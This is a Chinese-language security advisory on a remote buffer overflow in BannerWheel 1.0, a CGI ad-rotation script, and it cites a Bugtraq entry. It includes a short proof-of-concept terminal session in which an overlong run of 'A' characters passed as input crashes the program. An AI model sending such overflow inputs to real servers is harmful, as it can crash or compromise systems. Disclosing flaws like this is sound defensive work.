BannerWheel存在远程缓冲溢出漏洞发布时间:2002-05-23 更新时间:2002-05-23 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:4782 受影响系统 BannerWheel BannerWheel 1.0详细描述 BannerWheel是广告循环广播系统,可使用在多种系统平台下。 其中对用户提供的数据缺少检查,导致出现缓冲溢出,存在以WEB进程的权限执行任意代码的可能。 测试代码 [capzlock@signal-11 ~/hack/the/planet]$ gcc badmin.c -o badmin.cgi -lcrypt [capzlock@signal-11 ~/hack/the/planet]$ ./badmin bwe(input): "command" ? kill.the.turkey bwe(input): "rcmd" ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bwe(input): "flag" ? kill.the.turkey Segmentation fault [capzlock@signal-11 ~/hack/the/planet]$ 解决方案 尚无 相关信息 <capzlock@hushmail.com>. 参考:http://online.securityfocus.com/archive/1/273237 相关主页:http://www.freescripts.com/cgi-bin/page.pl?htmldir=scripts/le&page=bannerwheelle |
